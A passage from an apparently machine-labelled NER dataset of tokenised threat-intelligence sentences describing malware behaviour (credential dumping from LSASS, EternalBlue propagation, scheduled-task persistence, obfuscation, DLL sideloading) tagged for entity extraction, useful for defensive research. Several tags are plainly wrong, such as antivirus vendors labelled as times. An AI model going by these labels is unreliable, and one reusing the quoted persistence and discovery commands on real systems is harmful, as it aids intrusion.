"from", - "the", - "C2", - "server", - "before", - "executing", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "xCaon", - "has", - "a", - "command", - "to", - "download", - "files", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "xCaon", - "has", - "leveraged", - "native", - "OS", - "function", - "calls", - "to", - "retrieve", - "victim's", - "network", - "adapter's", - "information", - "using", - "GetAdapterInfo()", - "API." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "xCaon", - "has", - "checked", - "for", - "the", - "existence", - "of", - "Kaspersky", - "antivirus", - "software", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "xCaon", - "has", - "used", - "Base64", - "to", - "encode", - "its", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "xCaon", - "has", - "encrypted", - "data", - "sent", - "to", - "the", - "C2", - "server", - "using", - "a", - "XOR", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "xCaon", - "has", - "used", - "the", - "GetAdaptersInfo()", - "API", - "call", - "to", - "get", - "the", - "victim's", - "MAC", - "address." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "xCaon", - "has", - "communicated", - "with", - "the", - "C2", - "server", - "by", - "sending", - "POST", - "requests", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "xCaon", - "has", - "a", - "command", - "to", - "start", - "an", - "interactive", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "xCmd", - "can", - "be", - "used", - "to", - "execute", - "binaries", - "on", - "remote", - "systems", - "by", - "creating", - "and", - "starting", - "a", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "yty", - "communicates", - "to", - "the", - "C2", - "server", - "by", - "retrieving", - "a", - "Google", - "Doc." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "yty", - "contains", - "junk", - "code", - "in", - "its", - "binary,", - "likely", - "to", - "confuse", - "malware", - "analysts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "yty", - "collects", - "files", - "with", - "the", - "following", - "extensions:", - ".ppt,", - ".pptx,", - ".pdf,", - ".doc,", - ".docx,", - ".xls,", - ".xlsx,", - ".docm,", - ".rtf,", - ".inp,", - ".xlsm,", - ".csv,", - ".odt,", - ".pps,", - ".vcf", - "and", - "sends", - "them", - "back", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "yty", - "gathers", - "information", - "on", - "victim’s", - "drives", - "and", - "has", - "a", - "plugin", - "for", - "document", - "listing." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "yty", - "uses", - "a", - "keylogger", - "plugin", - "to", - "gather", - "keystrokes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "yty", - "gets", - "an", - "output", - "of", - "running", - "processes", - "using", - "the", - "<code>tasklist</code>", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "yty", - "uses", - "the", - "<code>net", - "view</code>", - "command", - "for", - "discovery." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "yty", - "establishes", - "persistence", - "by", - "creating", - "a", - "scheduled", - "task", - "with", - "the", - "command", - "<code>SchTasks", - "/Create", - "/SC", - "DAILY", - "/TN", - "BigData", - "/TR", - "“", - "+", - "path_file", - "+", - "“/ST", - "09:30“</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "yty", - "collects", - "screenshots", - "of", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "yty", - "packs", - "a", - "plugin", - "with", - "UPX." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "yty", - "has", - "some", - "basic", - "anti-sandbox", - "detection", - "that", - "tries", - "to", - "detect", - "Virtual", - "PC,", - "Sandboxie,", - "and", - "VMware." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "yty", - "gathers", - "the", - "computer", - "name,", - "the", - "serial", - "number", - "of", - "the", - "main", - "disk", - "volume,", - "CPU", - "information,", - "Microsoft", - "Windows", - "version,", - "and", - "runs", - "the", - "command", - "<code>systeminfo</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "yty", - "runs", - "<code>ipconfig", - "/all</code>", - "and", - "collects", - "the", - "domain", - "name." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "yty", - "collects", - "the", - "victim’s", - "username." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "zwShell", - "has", - "deleted", - "itself", - "after", - "creating", - "a", - "service", - "as", - "well", - "as", - "deleted", - "a", - "temporary", - "file", - "when", - "the", - "system", - "reboots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "zwShell", - "can", - "browse", - "the", - "file", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "zwShell", - "can", - "modify", - "the", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "zwShell", - "has", - "used", - "RDP", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "zwShell", - "has", - "been", - "copied", - "over", - "network", - "shares", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "zwShell", - "has", - "used", - "SchTasks", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "zwShell", - "can", - "obtain", - "the", - "victim", - "PC", - "name", - "and", - "OS", - "version." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "zwShell", - "can", - "obtain", - "the", - "victim", - "IP", - "address." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "zwShell", - "can", - "obtain", - "the", - "name", - "of", - "the", - "logged-in", - "user", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "zwShell", - "can", - "launch", - "command-line", - "shells." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "zwShell", - "has", - "established", - "persistence", - "by", - "adding", - "itself", - "as", - "a", - "new", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "file", - "extracts", - "credentials", - "from", - "LSASS", - "similar", - "to", - "Mimikatz." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "It", - "calls", - "OpenProcess", - "on", - "lsass.exe", - "with", - "access", - "flag", - "set", - "to", - "VM_READ,", - "and", - "looks", - "for", - "the", - "modules", - "wdigest.dll", - "and", - "lsasrv.dll", - "loaded", - "in", - "the", - "lsass.exe", - "process." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "It", - "spreads", - "to", - "Microsoft", - "Windows", - "machines", - "using", - "several", - "propagation", - "methods,", - "including", - "the", - "EternalBlue", - "exploit", - "for", - "the", - "CVE-2017-0144", - "vulnerability", - "in", - "the", - "SMB", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "SMB", - "exploitation", - "via", - "EternalBlue" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "SMBv1", - "Exploitation", - "via", - "EternalBlue" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "has", - "the", - "capability", - "to", - "exploit", - "SMBv1", - "via", - "the", - "well", - "known", - "EternalBlue", - "exploit." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Features", - "B-Exp" - ] - }, - { - "tokens": [ - "SMB", - "copy", - "and", - "remote", - "execution" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "thread", - "is", - "then", - "used", - "to", - "execute", - "the", - "SMB", - "copy", - "and", - "remote", - "execution" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMB", - "copy", - "and", - "remote", - "execution" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMB", - "Copy", - "and", - "Remote", - "Execution" - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "The", - "malware", - "decompresses", - "its", - "resource", - "named" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "decompresses", - "a", - "resource" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "is", - "used", - "as", - "an", - "integrity", - "check", - "for", - "the", - "decryption", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "the", - "MFT," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "code", - "attempts", - "to", - "decrypt", - "the", - "contents" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "sector", - "is", - "decrypted," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "the", - "same", - "key", - "is", - "used", - "to", - "decrypt", - "the", - "MFT." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "also", - "decoded,", - "and", - "placed", - "back" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "its", - "resource", - "section", - "are", - "decompressed", - "and", - "written", - "to", - "disk" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "is", - "a", - "DLL", - "that", - "is", - "launched", - "using", - "rundll32.exe:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "being", - "invoked", - "by", - "rundll32.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Command", - "Line", - "Execution" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "command", - "line", - "arguments", - "are", - "generated" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "also", - "spawns", - "cmd.exe", - "to", - "execute", - "the", - "following", - "command" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "hashes", - "each", - "running", - "process", - "on", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Process", - "Hashes", - "and", - "Process", - "Privilege", - "Checks" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "track", - "which", - "of", - "the", - "3", - "processes", - "are", - "running", - "on", - "the", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "compares", - "each", - "hash", - "with", - "3", - "hardcoded", - "hashes:", - "0x6403527E", - "→", - "avp.exe", - "associated", - "with", - "Kaspersky", - "AV", - "0x23214B44", - "→", - "ns.exe", - "associated", - "with", - "Norton", - "Security", - "0x651B3005", - "→", - "ccSvcHst.exe", - "associated", - "with", - "Symantec" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "using", - "the", - "API", - "NtRaiseHardError" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "invokes", - "the", - "following", - "API’s:" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "GetExtendedTcpTable", - "to", - "retrieve", - "a", - "list", - "of", - "TCP", - "endpoints", - "GetIpNetTable", - "to", - "retrieve" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NetServerEnum", - "to", - "get", - "a", - "list" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NetServerGetInfoto", - "retrieve", - "the", - "current", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CreateFile", - "and", - "WriteFile", - "are", - "used" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "CreateProcessAsUser", - "or", - "CreateProcess", - "is", - "executed," - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "created", - "using", - "the", - "same", - "API", - "call;" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calls", - "CryptEncrypt" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "also", - "invokes", - "the", - "API", - "NTRaiseHardError." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "undocumented", - "Windows", - "API", - "that", - "causes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "the", - "API", - "fails", - "to", - "execute,", - "the", - "malware", - "calls", - "InitiateSystemShutdownExW" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "NetServerGetInfoto", - "retrieve", - "the", - "current", - "configuration", - "for", - "the", - "local", - "server" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Obtains", - "the", - "IP", - "address", - "from", - "the", - "ClientIpAddress", - "field" - ], - "ner_tags": [ - "B-SamFile", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "There", - "are", - "two", - "approaches", - "to", - "using", - "valid", - "credentials", - "to", - "copy", - "and", - "execute", - "the", - "malware", - "to", - "a", - "remote", - "host:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "used", - "to", - "connect", - "to", - "a", - "server", - "using", - "the", - "default", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WMIC" - ], - "ner_tags": [ - "B-Time" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\wbem\\wmic.exe", - "/node" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "encodes", - "it", - "using", - "XOR", - "encoding", - "with", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contains", - "the", - "original", - "MBR", - "that", - "was", - "encoded", - "by", - "XORing" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "were", - "previously", - "encrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "original", - "encoded", - "MBR" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obtain", - "keystrokes,", - "and", - "status", - "of", - "keyboard", - "buffer" - ], - "ner_tags": [ - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "only", - "targets", - "fixed", - "drives", - "on", - "the", - "system." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "will", - "first", - "start", - "enumerating", - "files", - "in", - "the", - "directory", - "it", - "is", - "being", - "executed", - "from." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "scheduled", - "task", - "is", - "set", - "to", - "trigger", - "60", - "minutes", - "after", - "the", - "malware", - "execution", - "by", - "default." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "scheduled", - "task", - "will", - "trigger", - "30", - "minutes", - "after", - "the", - "malware", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Explanation", - "of", - "schtask", - "parameters" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "taskrun.", - "Path", - "and", - "filename", - "of", - "the", - "task", - "to", - "be", - "run" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "instance,", - "immediately", - "after", - "execution,", - "it", - "loads", - "itself", - "in", - "memory,", - "and", - "deletes", - "itself", - "from", - "the", - "disk." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "delete", - "important", - "files" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "configuration", - "file", - "will", - "be", - "deleted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "use", - "Themida", - "packer", - "to", - "obfuscate", - "the", - "signature", - "used", - "for", - "detection." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "packed", - "by", - "noted", - "tools" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Themida-packed" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "upload/download", - "file" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "remote", - "shell", - "functions." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "supports", - "proxy", - "(Socks5)," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "with", - "SOCKS", - "v5", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "to", - "dump", - "information", - "from", - "the", - "victim’s", - "Oracle", - "database." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "information", - "stealer", - "used", - "to", - "harvest", - "internal", - "information." - ], - "ner_tags": [ - "O", - "I-SamFile", - "B-SecTeam", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Obfuscated", - "PowerShell", - "script" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "multi-layer", - "obfuscation" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "obfuscate", - "their", - "tools" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "have", - "adopted", - "more", - "obfuscation", - "techniques" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heavily", - "obfuscated", - "PowerShell", - "script" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "the", - "encrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "encrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "obfuscate", - "control", - "flow", - "of", - "program." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Heavy", - "obfuscation", - "in", - "a", - "simple", - "but", - "useful", - "anti-analysis", - "approach", - "makes", - "it", - "difficult", - "for", - "security", - "products", - "to", - "detect", - "their", - "scripts." - ], - "ner_tags": [ - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "use", - "multi-layered", - "AES", - "encryption", - "and", - "base64", - "encoding", - "to", - "obfuscate" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscate", - "the", - "execution", - "flow", - "of", - "the", - "program" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decryption", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "with", - "RC4", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "usage", - "of", - "a", - "highly", - "similar", - "decryption", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "decrypt", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "it" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decryption", - "function", - "into", - "RC4" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "always", - "have", - "used", - "DLL", - "sideloading", - "as", - "their", - "major", - "technique", - "to", - "launch", - "their", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "adopted", - "DLL", - "sideloading", - "techniques", - "to", - "run", - "their", - "malware." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "DLL", - "sideloading", - "to", - "launch", - "their", - "malware" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malicious", - "DLL", - "“gtn.dll”,", - "which", - "we", - "named", - "as", - "“ShellFang”,", - "loads", - "when", - "a", - "legitimate", - "executable", - "is", - "launched." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "including", - "API", - "hashing", - "and", - "execution", - "flow", - "obfuscation", - "through", - "exception", - "mechanism" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "APIs", - "are", - "obfuscated", - "via", - "a", - "hashing", - "function", - "and", - "dynamically", - "resolved", - "in", - "the", - "run-time." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Necessary", - "APIs", - "will", - "be", - "dynamically", - "resolved", - "during", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "API", - "obfuscation,", - "and", - "execution", - "flow", - "obfuscation" - ], - "ner_tags": [ - "B-Exp", - "B-Exp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "abusing", - "exception", - "mechanisms", - "to", - "obfuscate", - "the", - "execution", - "flow", - "of", - "programs", - "and", - "Windows", - "API", - "hashing." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "final", - "payload", - "is", - "an", - "HTTPs", - "Cobalt", - "Strike", - "beacon." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "by", - 